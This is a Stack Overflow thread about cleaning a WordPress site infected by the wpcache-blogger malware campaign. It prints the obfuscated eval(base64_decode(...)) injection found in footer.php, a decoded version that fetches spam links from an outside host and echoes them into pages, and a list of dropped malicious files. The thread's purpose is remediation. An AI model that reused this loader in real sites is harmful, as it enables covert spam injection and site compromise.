# Mystical sudden wordpress error: wpcache-blogger.com/sape-rolling-sites/config.php

Tags: php, wordpress

Suddenly this showed up on my wordpress website:

> Parse error: syntax error, unexpected ';', expecting ')' in /var/www/admin/data/www/wpcache-blogger.com/sape-rolling-sites/config.php on line 79

I haven't edited anything for a while & if I look through the FTP for the folder, there is no folder called "admin" under `var/www`.

Have you guys seen anything like this before? 
I found another thread but no solutions, apparently it have happend to a couple of people, but there seem to be no final answer.

Please let me know if you have any experience with this

Comment: If you found [another question](http://stackoverflow.com/questions/27458368/unknown-error-occured-in-my-wordpress-site) you should perhaps add information there, rather than asking another version.

Comment: Here's a link to at article explaining the recent hack related to wpcache-blogger: http://blog.sucuri.net/2014/12/new-malware-campaign-wpcache-blogger-affects-thousands-more-wordpress-websites-via-revslider.html

Answer (score 2, accepted):

The answer is within your root

go into the file system and find the footer.php

then find the templates/footer.php

you will see the following:

/*  */eval(base64_decode("ZnVuY3Rpb24gZmlsZV9nZXRfY29udGVudHNfY3VybCgkdXJsKSB7CiAkY2ggPSBjdXJsX2luaXQoKTsKIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgIkxPQ0FMU0FQRSIpOwogJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKIGN1cmxfY2xvc2UoJGNoKTsKIHJldHVybiAkZGF0YTsKfQokbGlua3MgPSBmaWxlX2dldF9jb250ZW50c19jdXJsKCJodHRwOi8vd3BjYWNoZS1ibG9nZ2VyLmNvbS9nZXRsaW5rcy5waHA/YXBpY29kZT1sYWxhbGE0NCZwYWdldXJsPSIudXJsZW5jb2RlKCdodHRwOi8vJy4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkuIiZ1c2VyYWdlbnQ9Ii51cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKS4iIik7CmVjaG8gJGxpbmtzOw=="));/*  */ ?>

Remove it ........

from both areas and save - this will fix the issue

Comment: So, basically, @ahog's site has been hacked? You might want to mention that and point to [the FAQ](http://codex.wordpress.org/FAQ_My_site_was_hacked) for measures to prevent it being re-hacked...

Comment: Thank you so much that worked! There's been plenty of troubles with malware lately, I've got protection, changed FTP password and everything but it just keeps coming back... Thank you so much

Comment: Yes the site has had the footers re-written

Comment: The fix is ok but please change the whole password set up

Comment: The following files are all created by this hack:
"wp-includes/xmlrpc.php"
"wp-includes/.htaccess"
"wp-admin/.htaccess"
"wp-admin/ms-head.php"
"wp-admin/headers/wp-class-headers.php"
"wp-admin/headers/jquery.php"
"wp-admin/options-admin.php"
"wp-admin/class-wp-index.php"
"wp-options.php"

Also, the main index.php in the root directory is infected, and should be replaced by a copy from a clean site/install

Answer (score 2):

This is what the code was doing...

```
function file_get_contents_curl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "LOCALSAPE");
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$links = file_get_contents_curl("http://wpcache-blogger.com/getlinks.php?               apicode=lalala44&pageurl=".urlencode('http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'])."&use   ragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."");
echo $links;
```

Comment: Black Hat attack? SAPE?

Comment: Install this plugin "Limit Login Attempts" after reparing

Comment: Thanks for the tip, I'm doing that instantly! And that's a lot for the explanation

Answer (score 1):

It is not just footer you got infected.
Check if you have following files:

```
footer.php,  frommshead.php,  options-admin.php,  wpinstall - Copy.php
```

footer is where the iframe was added (in base64), the rest is the code to infect it

Answer (score 1):

This hack all has to do with the Revolution Slider plugin. Make sure you update the slider first. Then change the footer and delete the files. frommshead.php, options-admin.php, wpinstall - copy.php

If you have multiple installs of wordpress on your server check them all.